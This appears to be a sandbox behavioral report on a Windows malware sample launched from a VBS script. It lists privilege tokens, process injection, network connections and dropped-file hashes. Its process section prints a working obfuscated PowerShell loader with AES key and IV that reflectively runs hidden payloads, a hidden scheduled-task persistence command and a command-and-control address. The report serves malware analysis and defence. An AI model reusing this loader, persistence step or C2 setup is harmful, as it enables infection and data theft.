Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3236 wrote to memory of 1340 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3236 wrote to memory of 1340 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1340 wrote to memory of 2516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1340 wrote to memory of 2516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1340 wrote to memory of 4612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 4612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 3612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 3612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 4772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 4772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 2140 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 2140 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4612 wrote to memory of 1664 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 4612 wrote to memory of 1664 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 1664 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\All-In-One.exe
PID 1664 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\All-In-One.exe
PID 1664 wrote to memory of 2092 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\All-In-One.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4612 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1188 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1188 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1188 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 1644 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe
PID 3372 wrote to memory of 1644 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe
PID 3372 wrote to memory of 1644 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\explorer.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wild2.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\dropped.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('ugGNW2NnPvk9adSUBcDc96/inp4cdhLsP4c8Xr7rMvA='); $aes_var.IV=[System.Convert]::FromBase64String('GuK3QAh6wjXaE/OXIlyZUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ikyRS=New-Object System.IO.MemoryStream(,$param_var); $tIvxd=New-Object System.IO.MemoryStream; $uIXwv=New-Object System.IO.Compression.GZipStream($ikyRS, [IO.Compression.CompressionMode]::Decompress); $uIXwv.CopyTo($tIvxd); $uIXwv.Dispose(); $ikyRS.Dispose(); $tIvxd.Dispose(); $tIvxd.ToArray();}function execute_function($param_var,$param2_var){ $kiXtP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $zdYbv=$kiXtP.EntryPoint; $zdYbv.Invoke($null, $param2_var);}$dTbxL = 'C:\Users\Admin\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $dTbxL;$cGnsR=[System.IO.File]::ReadAllText($dTbxL).Split([Environment]::NewLine);foreach ($QrlnJ in $cGnsR) { if ($QrlnJ.StartsWith('oJuhxRvpkzgxXdlXhMuO')) { $JHuZc=$QrlnJ.Substring(20); break; }}$payloads_var=[string[]]$JHuZc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\dropped')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c Cd %temp% && All-In-One.exe OutPut.json

C:\Users\Admin\AppData\Local\Temp\All-In-One.exe

All-In-One.exe OutPut.json

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 142.202.242.177 7000 <123456789> E7454CC4D6D92D307990

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 142.202.242.177:7000 tcp
US 8.8.8.8:53 177.242.202.142.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 142.202.242.177:7000 tcp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\dropped.bat

MD5 e770f53921bca6b9d02faf3e70059249
SHA1 fb04530ec135f2a34afd3bdf0c205193418812b6
SHA256 be7e5d1cccf5602cbe866ce6f342bd960263f3cd08a75d149372af37fa2a50b1
SHA512 f970fab83358451a7cb158d4377defa35188996b1f2005a90e1fe0e747db65424366efcc847c133919395310536348bc795caef3161a21b70b2b0cd16566ec86

memory/4612-2-0x00007FFFDF373000-0x00007FFFDF375000-memory.dmp

memory/4612-12-0x0000020FF3050000-0x0000020FF3072000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jo2u1dha.lar.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4612-13-0x00007FFFDF370000-0x00007FFFDFE31000-memory.dmp

memory/4612-14-0x00007FFFDF370000-0x00007FFFDFE31000-memory.dmp

memory/4612-15-0x0000020FF3460000-0x0000020FF34A4000-memory.dmp

memory/4612-16-0x0000020FF3530000-0x0000020FF35A6000-memory.dmp

memory/4612-28-0x0000020FF30A0000-0x0000020FF30A8000-memory.dmp

memory/4612-29-0x0000020FF30B0000-0x0000020FF30C0000-memory.dmp

memory/4612-30-0x00007FFFFD890000-0x00007FFFFDA85000-memory.dmp

memory/4612-32-0x0000020FF3410000-0x0000020FF3424000-memory.dmp

memory/4612-31-0x00007FFFFD1F0000-0x00007FFFFD2AE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3f01549ee3e4c18244797530b588dad9
SHA1 3e87863fc06995fe4b741357c68931221d6cc0b9
SHA256 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA512 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 97748f71ed95026706014e8524266292
SHA1 f60663ea2e2a778c57d07d9678fe04c79c3ff942
SHA256 f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f
SHA512 b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9

memory/4612-56-0x0000020FF3920000-0x0000020FF3936000-memory.dmp

memory/4612-58-0x00007FFFDF373000-0x00007FFFDF375000-memory.dmp

memory/4612-59-0x00007FFFDF370000-0x00007FFFDFE31000-memory.dmp

memory/4612-60-0x0000020FF4570000-0x0000020FF468E000-memory.dmp

memory/4612-99-0x0000020FF4EF0000-0x0000020FF53C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\External\Components\nss3.dll

MD5 7ddbd64d87c94fd0b5914688093dd5c2
SHA1 d49d1f79efae8a5f58e6f713e43360117589efeb
SHA256 769703fb1ba6c95fb6c889e8a9baaea309e62d0f3ca444d01cc6b495c0f722d1
SHA512 60eaad58c3c4894f1673723eb28ddb42b681ff7aafe7a29ff8bf87a2da6595c16d1f8449096accdb89bd6cda6454eb90470e71dde7c5bd16abd0f80e115cfa2d

C:\Users\Admin\AppData\Local\Temp\External\Components\nspr4.dll

MD5 72414dfb0b112c664d2c8d1215674e09
SHA1 50a1e61309741e92fe3931d8eb606f8ada582c0a
SHA256 69e73fea2210adc2ae0837ac98b46980a09fe91c07f181a28fda195e2b9e6b71
SHA512 41428624573b4a191b33657ed9ad760b500c5640f3d62b758869a17857edc68f90bc10d7a5e720029519c0d49b5ca0fa8579743e80b200ef331e41efde1dc8c9

C:\Users\Admin\AppData\Local\Temp\External\Components\plc4.dll

MD5 c73ec58b42e66443fafc03f3a84dcef9
SHA1 5e91f467fe853da2c437f887162bccc6fd9d9dbe
SHA256 2dc0171b83c406db6ec9389b438828246b282862d2b8bdf2f5b75aec932a69f7
SHA512 6318e831d8f38525e2e49b5a1661440cd8b1f3d2afc6813bb862c21d88d213c4675a8ec2a413b14fbdca896c63b65a7da6ec9595893b352ade8979e7e86a7fcf

C:\Users\Admin\AppData\Local\Temp\External\Components\plds4.dll

MD5 ee44d5d780521816c906568a8798ed2f
SHA1 2da1b06d5de378cbfc7f2614a0f280f59f2b1224
SHA256 50b2735318233d6c87b6efccccc23a0e3216d2870c67f2f193cc1c83c7c879fc
SHA512 634a1cd2baaef29b4fe7c7583c04406bb2ea3a3c93294b31f621652844541e7c549da1a31619f657207327604c261976e15845571ee1efe5416f1b021d361da8

C:\Users\Admin\AppData\Local\Temp\External\Components\softokn3.dll

MD5 e846285b19405b11c8f19c1ed0a57292
SHA1 2c20cf37394be48770cd6d396878a3ca70066fd0
SHA256 251f0094b6b6537df3d3ce7c2663726616f06cfb9b6de90efabd67de2179a477
SHA512 b622ff07ae2f77e886a93987a9a922e80032e9041ed41503f0e38abb8c344eb922d154ade29e52454d0a1ad31596c4085f4bd942e4412af9f0698183acd75db7

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-conio-l1-1-0_not.dll

MD5 6ea692f862bdeb446e649e4b2893e36f
SHA1 84fceae03d28ff1907048acee7eae7e45baaf2bd
SHA256 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2
SHA512 9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-convert-l1-1-0.dll

MD5 72e28c902cd947f9a3425b19ac5a64bd
SHA1 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
SHA256 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
SHA512 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-environment-l1-1-0.dll

MD5 ac290dad7cb4ca2d93516580452eda1c
SHA1 fa949453557d0049d723f9615e4f390010520eda
SHA256 c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
SHA512 b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 aec2268601470050e62cb8066dd41a59
SHA1 363ed259905442c4e3b89901bfd8a43b96bf25e4
SHA256 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
SHA512 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-heap-l1-1-0.dll

MD5 93d3da06bf894f4fa21007bee06b5e7d
SHA1 1e47230a7ebcfaf643087a1929a385e0d554ad15
SHA256 f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
SHA512 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-locale-l1-1-0.dll

MD5 a2f2258c32e3ba9abf9e9e38ef7da8c9
SHA1 116846ca871114b7c54148ab2d968f364da6142f
SHA256 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
SHA512 e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-math-l1-1-0.dll

MD5 8b0ba750e7b15300482ce6c961a932f0
SHA1 71a2f5d76d23e48cef8f258eaad63e586cfc0e19
SHA256 bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
SHA512 fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-multibyte-l1-1-0.dll

MD5 35fc66bd813d0f126883e695664e7b83
SHA1 2fd63c18cc5dc4defc7ea82f421050e668f68548
SHA256 66abf3a1147751c95689f5bc6a259e55281ec3d06d3332dd0ba464effa716735
SHA512 65f8397de5c48d3df8ad79baf46c1d3a0761f727e918ae63612ea37d96adf16cc76d70d454a599f37f9ba9b4e2e38ebc845df4c74fc1e1131720fd0dcb881431

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-runtime-l1-1-0.dll

MD5 41a348f9bedc8681fb30fa78e45edb24
SHA1 66e76c0574a549f293323dd6f863a8a5b54f3f9b
SHA256 c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b
SHA512 8c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-stdio-l1-1-0.dll

MD5 fefb98394cb9ef4368da798deab00e21
SHA1 316d86926b558c9f3f6133739c1a8477b9e60740
SHA256 b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
SHA512 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-string-l1-1-0.dll

MD5 404604cd100a1e60dfdaf6ecf5ba14c0
